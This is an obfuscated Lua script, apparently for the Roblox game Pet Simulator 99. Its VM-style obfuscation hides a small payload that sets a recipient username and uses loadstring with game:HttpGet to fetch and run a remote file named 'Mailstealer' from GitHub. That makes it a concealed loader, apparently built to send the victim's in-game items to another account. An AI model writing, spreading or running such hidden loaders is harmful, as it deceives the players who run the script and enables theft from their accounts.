--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v82,v19);v19=nil;v90=1;end end else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=1637 -(1523 + 114) ;local v84;while true do if ((0 -0)==v83) then v84=(v31/(2^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v84-(v84%(569 -(367 + 201))) ;end end else local v85=927 -(214 + 713) ;local v86;while true do if ((0 + 0 + 0)==v85) then v86=(1 + 1)^(v32-1) ;return (((v31%(v86 + v86))>=v86) and (878 -(282 + (847 -252)))) or 0 ;end end end end local function v21()local v34=0;local v35;while true do if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -((343 -(32 + 85)) + 1044)) ;v34=4 -(3 + 0) ;end if (v34==1) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v37 * 256) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 4 ;return (v41 * ((31011792 -(67 + 113)) -14234396)) + (v40 * (120312 -54776)) + (v39 * (606 -(87 + 263))) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,2 -1 ,20) * ((2 + (18 -(10 + 8)))^(127 -95))) + v42 ;local v46=v20(v43,(3742 -2769) -(802 + 150) ,83 -52 );local v47=((v20(v43,32)==(443 -(416 + 26))) and  -(1 -0)) or (1 + 0) ;if (v46==(997 -(915 + 82))) then if (v45==((0 -0) -0)) then return v47 * 0 ;else local v92=0 + 0 ;while true do if (v92==((0 + 0) -0)) then v46=1188 -(1069 + 118) ;v44=0 -0 ;break;end end end elseif (v46==2047) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1015 + 8) ) * (v44 + (v45/((793 -(368 + 423))^((287 -124) -111)))) ;end local function v25(v48)local v49=438 -((514 -369) + 293) ;local v50;local v51;while true do if (v49==(432 -(44 + 386))) then v51={};for v93=1487 -(998 + 488) , #v50 do v51[v93]=v2(v1(v3(v50,v93,v93)));end v49=1 + 2 ;end if (v49==(0 + 0)) then v50=nil;if  not v48 then v48=v23();if (v48==(772 -(201 + 571))) then return "";end end v49=1139 -(116 + 1022) ;end if (v49==1) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=(29 -21) -6 ;end if (v49==(2 + 1)) then return v6(v51);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(1001 -(451 + 549))) then v55=nil;v56=nil;v52=1 + 1 ;end if ((4 -1)==v52) then v59=nil;v60=nil;v52=4;end if (v52==(0 -0)) then v53=1384 -(746 + 638) ;v54=nil;v52=1 + 0 ;end if (v52==(2 -0)) then v57=nil;v58=nil;v52=344 -(218 + 123) ;end if (v52==4) then while true do if (v53==2) then local v99=0;local v100;while true do if (v99==(1581 -(1535 + 46))) then v100=0 + 0 ;while true do if (v100~=0) then else local v121=0;while true do if (v121~=0) then else v58=nil;v59=nil;v121=1;end if (v121==1) then v100=1;break;end end end if (v100~=1) then else v53=3;break;end end break;end end end if (v53==3) then v60=nil;while true do local v103=0;local v104;while true do if (v103~=(0 + 0)) then else v104=560 -(306 + 254) ;while true do if (v104==(1 + 0)) then if (v54==0) then local v159=0 -0 ;while true do if (v159==1) then v57={};v58={v55,v56,nil,v57};v159=2;end if (v159==(0 + 0)) then local v169=0 -0 ;local v170;while true do if (v169~=(603 -(268 + 335))) then else v170=290 -(60 + 230) ;while true do if (v170==1) then v159=1;break;end if (v170~=(572 -(426 + 146))) then else v55={};v56={};v170=1;end end break;end end end if (v159~=2) then else v54=1 + 0 ;break;end end end break;end if (v104==0) then local v144=1456 -(282 + 1174) ;while true do if (v144==(811 -(569 + 242))) then if (v54==(2 -1)) then local v171=0 + 0 ;local v172;while true do if (v171==0) then v172=1024 -(706 + 318) ;while true do if (v172==(1251 -(721 + 530))) then v59=v23();v60={};v172=1;end if (v172==1) then for v177=1272 -(945 + 326) ,v59 do local v178=0 -0 ;local v179;local v180;local v181;local v182;local v183;while true do if (v178==(0 + 0)) then v179=700 -(271 + 429) ;v180=nil;v178=1;end if (v178~=(2 + 0)) then else v183=nil;while true do if (v179~=2) then else while true do if (v180==1) then v183=nil;while true do if (v181~=0) then else local v198=1500 -(1408 + 92) ;local v199;while true do if (v198==(1086 -(461 + 625))) then v199=1288 -(993 + 295) ;while true do if (v199==(0 + 0)) then local v208=1171 -(418 + 753) ;while true do if (v208==(1 + 0)) then v199=1 + 0 ;break;end if (v208==(0 + 0)) then v182=v21();v183=nil;v208=1;end end end if (v199==(1 + 0)) then v181=1;break;end end break;end end end if (v181~=1) then else if (v182==(530 -(406 + 123))) then v183=v21()~=(1769 -(1749 + 20)) ;elseif (v182==2) then v183=v24();elseif (v182~=3) then else v183=v25();end v60[v177]=v183;break;end end break;end if (v180==(0 + 0)) then local v192=0;while true do if (v192~=0) then else local v201=1322 -(1249 + 73) ;while true do if (v201==0) then v181=0 + 0 ;v182=nil;v201=1;end if (v201==(1146 -(466 + 679))) then v192=1;break;end end end if (v192==(2 -1)) then v180=1;break;end end end end break;end if (v179==0) then local v185=0;while true do if (v185==1) then v179=2 -1 ;break;end if (v185==0) then v180=0;v181=nil;v185=1901 -(106 + 1794) ;end end end if (v179==(1 + 0)) then local v186=0;while true do if ((0 + 0)==v186) then v182=nil;v183=nil;v186=2 -1 ;end if (1==v186) then v179=2;break;end end end end break;end if (v178~=1) then else v181=nil;v182=nil;v178=5 -3 ;end end end v58[3]=v21();v172=116 -(4 + 110) ;end if (2==v172) then v54=2;break;end end break;end end end if (v54==(586 -(57 + 527))) then local v173=0;local v174;local v175;while true do if (v173~=(1427 -(41 + 1386))) then else v174=103 -(17 + 86) ;v175=nil;v173=1;end if (v173~=1) then else while true do if (0==v174) then v175=0 + 0 ;while true do if (v175~=0) then else local v184=0 -0 ;while true do if (v184~=1) then else v175=2 -1 ;break;end if (v184==0) then for v187=167 -(122 + 44) ,v23() do local v188=0;local v189;while true do if (v188==0) then v189=v21();if (v20(v189,1 -0 ,1)==0) then local v193=0 -0 ;local v194;local v195;local v196;local v197;while true do if ((1 + 0)==v193) then v196=nil;v197=nil;v193=1 + 1 ;end if (v193==(0 -0)) then v194=65 -(30 + 35) ;v195=nil;v193=1 + 0 ;end if ((1259 -(1043 + 214))==v193) then while true do if (v194==(11 -8)) then if (v20(v196,1215 -(323 + 889) ,7 -4 )==1) then v197[584 -(361 + 219) ]=v60[v197[4]];end v55[v187]=v197;break;end if (v194~=(321 -(53 + 267))) then else local v203=0 + 0 ;local v204;while true do if (v203==(413 -(15 + 398))) then v204=0;while true do if (0==v204) then v197={v22(),v22(),nil,nil};if (v195==0) then local v212=0;local v213;while true do if (v212~=(0 + 0)) then else v213=0 + 0 ;while true do if (v213==0) then v197[853 -(20 + 830) ]=v22();v197[4]=v22();break;end end break;end end elseif (v195==1) then v197[3 + 0 ]=v23();elseif (v195==2) then v197[3]=v23() -(2^16) ;elseif (v195==3) then local v222=126 -(116 + 10) ;local v223;while true do if (v222~=(0 + 0)) then else v223=0;while true do if (v223~=(738 -(542 + 196))) then else v197[6 -3 ]=v23() -(2^(5 + 11)) ;v197[3 + 1 ]=v22();break;end end break;end end end v204=1 + 0 ;end if (v204==(2 -1)) then v194=2;break;end end break;end end end if (2~=v194) then else local v205=0;local v206;while true do if (v205~=(0 -0)) then else v206=1551 -(1126 + 425) ;while true do if (v206~=1) then else v194=3;break;end if (v206==0) then local v211=405 -(118 + 287) ;while true do if ((0 -0)~=v211) then else if (v20(v196,1122 -(118 + 1003) ,1)~=1) then else v197[5 -3 ]=v60[v197[379 -(142 + 235) ]];end if (v20(v196,2,9 -7 )~=(1 + 0)) then else v197[3]=v60[v197[980 -(553 + 424) ]];end v211=1;end if (v211==(1 -0)) then v206=1;break;end end end end break;end end end if (v194==(0 + 0)) then local v207=0;while true do if (1==v207) then v194=1 + 0 ;break;end if (v207==0) then v195=v20(v189,2,2 + 1 );v196=v20(v189,2 + 2 ,4 + 2 );v207=2 -1 ;end end end end break;end end end break;end end end for v190=2 -1 ,v23() do v56[v190-1 ]=v28();end v184=2 -1 ;end end end if (v175==1) then return v58;end end break;end end break;end end end v144=1;end if (v144==1) then v104=1;break;end end end end break;end end end break;end if (v53==(0 + 0)) then local v101=0 -0 ;while true do if (v101~=(753 -(239 + 514))) then else local v105=0;while true do if (v105==(1 + 0)) then v101=1;break;end if (v105~=(1329 -(797 + 532))) then else v54=0;v55=nil;v105=1 + 0 ;end end end if (v101~=1) then else v53=1;break;end end end if (v53==1) then local v102=0 + 0 ;while true do if (v102~=(2 -1)) then else v53=1204 -(373 + 829) ;break;end if ((731 -(476 + 255))==v102) then v56=nil;v57=nil;v102=1;end end end end break;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80==0) then do return;end else local v106=0;local v107;local v108;local v109;local v110;while true do if (v106==0) then v107=v79[2];v108,v109=v70(v77[v107](v13(v77,v107 + 1 ,v79[3])));v106=1;end if (v106==2) then for v155=v107,v72 do local v156=0;while true do if (v156==0) then v110=v110 + 1 ;v77[v155]=v108[v110];break;end end end break;end if (1==v106) then v72=(v109 + v107) -1 ;v110=0;v106=2;end end end elseif (v80<=2) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end elseif (v80==3) then local v125=v79[2];v77[v125]=v77[v125](v13(v77,v125 + 1 ,v72));elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=7) then if (v80<=5) then local v111=v79[2];v77[v111]=v77[v111](v13(v77,v111 + 1 ,v72));elseif (v80>6) then local v127=v79[2];local v128,v129=v70(v77[v127](v13(v77,v127 + 1 ,v79[3])));v72=(v129 + v127) -1 ;local v130=0;for v146=v127,v72 do local v147=0;while true do if (v147==0) then v130=v130 + 1 ;v77[v146]=v128[v130];break;end end end else v63[v79[3]]=v77[v79[2]];end elseif (v80<=8) then v77[v79[2]]=v79[3];elseif (v80>9) then v77[v79[2]]();else v63[v79[3]]=v77[v79[2]];end elseif (v80<=15) then if (v80<=12) then if (v80>11) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end else v71=v79[3];end elseif (v80<=13) then do return;end elseif (v80>14) then v77[v79[2]]=v79[3];else for v148=v79[2],v79[3] do v77[v148]=nil;end end elseif (v80<=18) then if (v80<=16) then local v116=0;local v117;local v118;while true do if (v116==1) then v77[v117 + 1 ]=v118;v77[v117]=v118[v79[4]];break;end if (v116==0) then v117=v79[2];v118=v77[v79[3]];v116=1;end end elseif (v80==17) then local v140=0;local v141;local v142;while true do if (0==v140) then v141=v79[2];v142=v77[v79[3]];v140=1;end if (1==v140) then v77[v141 + 1 ]=v142;v77[v141]=v142[v79[4]];break;end end elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=19) then for v119=v79[2],v79[3] do v77[v119]=nil;end elseif (v80>20) then v77[v79[2]]();else v71=v79[3];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503083O0052656E5877756933030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C657200153O0012083O00014O0013000100013O0026043O00020001000100040B3O00020001001208000100013O002604000100050001000100040B3O00050001001208000200033O001206000200023O00120C000200043O00120C000300053O002011000300030006001208000500074O0007000300054O000300023O00022O001500020001000100040B3O0014000100040B3O0005000100040B3O0014000100040B3O000200012O000D3O00017O00",v9(),...);
